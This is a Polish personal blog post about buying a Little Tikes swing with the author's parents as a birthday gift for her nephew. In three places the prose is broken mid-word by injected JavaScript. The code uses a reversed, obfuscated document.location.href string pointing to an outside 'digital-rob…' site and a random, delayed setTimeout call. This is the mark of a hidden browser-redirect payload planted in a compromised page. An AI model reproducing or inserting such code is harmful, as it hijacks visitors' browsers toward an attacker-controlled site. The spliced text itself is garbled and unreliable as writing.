Złożyłam się na huśtawkę z rodzicami

Wybieramy się na urodzinki do synka mojej siostry. Podpytywałam się co można u kupić. Mateusz ma bardzo dużo zabawek i przed każdymi urodzinami mam spory problem razem z moimi rodzicami. Siostra poradziła nam żeby kupić dla małego huśtawkę. Postanowiłam złożyć się na nią z moimi rodzicami.

Kupiłam huśtawkę na urodziny,

solidna huśtawka Little TikesHuśtawka, która mi się spodobała była dosyć droga. Zdecydowałam się dlatego złożyć z rodzicami żeby kupić porządny prezent, który będzie bezpieczny i wytrzymały dla dziecka. Solidna huśtawka Little Tikes była polecana przez wielu rodziców na różnych portalach. Ja nie mam jeszcze dzieci więc zawsze czytam różne opinie żeby prezent, który kupię był jak najlepszy. Solidna huśtawka Little Tikes miała bardzo dobre opinie i posiadała wszystkie niezbędne certyfikaty, które są wymagane dla zabawek. Huśtawkę zamówiłam przez internet dzięki temu udało mi się zaoszczędzić trochę pieniędzy. Huśtawka ma zostać do mnie dostarczona w ciągu dwóch dni roboczych. bardzo się z tego ciesze bo chciałabym jeszcze zapakować kartobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}ton w specjalny papier. Wiem, że Mateuszek będzie miał sporo radości jak będzie rozpakowywał swój prezent. Mateusz jest bardzo bystrym dzieckiem i uwielbia się bujać. Częstobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to wychodzę z nim na spacery do parku i wiem co lubi robić. Rodzice są zadowoleni z huśtawki, która do mnie już dotarła. Rozpakowałam kartobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}ton i wszystko dokładnie sprawdziłam,żeby mieć pewność że z huśtawką jest wszystko dobrze. 

Kupiłam papier dekoracyjny z ulubionym bohaterem Mateusza. na pewno bardzo się ucieszy jak zobaczy tak duży prezent. Od razu pewnie będzie chciał rozpakować prezent a także go wypróbować. Mam nadzieję, że będzie zadowolony z huśtawki. Już nie mogę się doczekać jego urodzin i miny jak zobaczy prezent, z którym do niego przyjdziemy.